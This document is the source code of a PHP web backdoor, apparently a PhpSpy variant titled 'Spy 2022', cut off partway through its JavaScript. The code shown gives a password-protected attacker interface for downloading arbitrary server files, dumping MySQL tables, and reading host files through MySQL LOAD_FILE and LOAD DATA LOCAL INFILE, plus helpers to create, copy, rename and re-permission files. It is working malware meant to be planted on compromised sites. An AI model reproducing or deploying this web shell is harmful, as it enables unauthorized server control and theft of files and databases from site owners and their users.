基于PHP的Spy 2022 WEB后门程序.zip

<?php error_reporting(7); @set_magic_quotes_runtime(0); ob_start(); $mtime = explode(' ', microtime()); $starttime = $mtime[1] + $mtime[0]; define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); define('IS_COM', class_exists('COM') ? 1 : 0 ); define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 ); @set_time_limit(0); foreach($_POST as $key => $value) { if (IS_GPC) { $value = s_array($value); } $$key = $value; } /*===================== 程序配置 =====================*/ //echo encode_pass('angel');exit; // 如果需要密码验证,请修改登陆密码,留空为不需要验证 $pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel //如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认 // cookie 前缀 $cookiepre = ''; // cookie 作用域 $cookiedomain = ''; // cookie 作用路径 $cookiepath = '/'; // cookie 有效期 $cookielife = 86400; //程序搜索可写文件的类型 !$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; /*===================== 配置结束 =====================*/ $charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); if ($charset == 'utf8') { header("content-Type: text/html; charset=utf-8"); } elseif ($charset == 'big5') { header("content-Type: text/html; charset=big5"); } elseif ($charset == 'gbk') { header("content-Type: text/html; charset=gbk"); } elseif ($charset == 'latin1') { header("content-Type: text/html; charset=iso-8859-2"); } elseif ($charset == 'euc-kr') { header("content-Type: text/html; charset=euc-kr"); } elseif ($charset == 'euc-jp') { header("content-Type: text/html; charset=euc-jp"); } $self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $timestamp = time(); /*===================== 身份验证 =====================*/ if ($action == "logout") { scookie('loginpass', '', -86400 * 365); @header('Location: '.$self); exit; } if($pass) { if ($action == 'login') { if ($pass == encode_pass($password)) { scookie('loginpass',encode_pass($password)); @header('Location: '.$self); exit; } } if ($_COOKIE['loginpass']) { if ($_COOKIE['loginpass'] != $pass) { loginpage(); } } else { loginpage(); } } /*===================== 验证结束 =====================*/ $errmsg = ''; !$action && $action = 'file'; // 查看PHPINFO if ($action == 'phpinfo') { if (IS_PHPINFO) { phpinfo(); exit; } else { $errmsg = 'phpinfo() function has non-permissible'; } } // 下载文件 if ($doing == 'downfile' && $thefile) { if (!@file_exists($thefile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $fileinfo = pathinfo($thefile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header('Content-Length: '.filesize($thefile)); @readfile($thefile); exit; } } // 直接下载备份数据库 if ($doing == 'backupmysql' && !$saveasfile) { if (!$table) { $errmsg ='Please choose the table'; } else { mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); $filename = basename($dbname.'.sql'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); foreach($table as $k => $v) { if ($v) { sqldumptable($v); } } mysql_close(); exit; } } // 通过MYSQL下载文件 if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); //用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk"> <title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title> <style type="text/css"> body,td{font: 12px Arial,Tahoma;line-height: 16px;} .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;} .area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;} .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;} a {color: #00f;text-decoration:underline;} a:hover{color: #f00;text-decoration:none;} .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;} .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;} .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;} .head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;} .head td span{font-weight:normal;} .infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;} form{margin:0;padding:0;} h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;} ul.info li{margin:0;color:#444;line-height:24px;height:24px;} u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;} .drives{padding:5px;} .drives span {margin:auto 7px;} </style> <script type="text/javascript"> function CheckAll(form) { for(var i=0;i<form.elements.length;i++) { var e = form.elements[i]; if (e.name != 'chkall') e.checked = form.chkall.checked; } } function $(id) { return document.getElementById(id); } function createdir(){ var newdirname; newdirname = prompt('Please input the directory name:', ''); if (!newdirname) return; $('createdir').newdirname.value=newdirname; $('createdir').submit(); } function fileperm(pfile){ var newperm; newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', ''); if (!newperm) return; $('fileperm').newperm.value=newperm; $('fileperm').pfile.value=pfile; $('fileperm').submit(); } function copyfile(sname){ var tofile; tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', ''); if (!tofile) return; $('copyfile').tofile.value=tofile; $('copyfile').sname.value=sname; $('copyfile').submit(); } function rename(oldname){ var newfilename; newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', ''); if (!newfilename) return; $('rename').newfilename.value=newfilename; $('rename').oldname.value=oldname; $('rename').submit(); } function dofile(doing,thefile,m){ if (m && !confirm(m)) { return; } $('filelist').doing.value=doing; if (thefile){ $('filelist').thefile.value=thefile;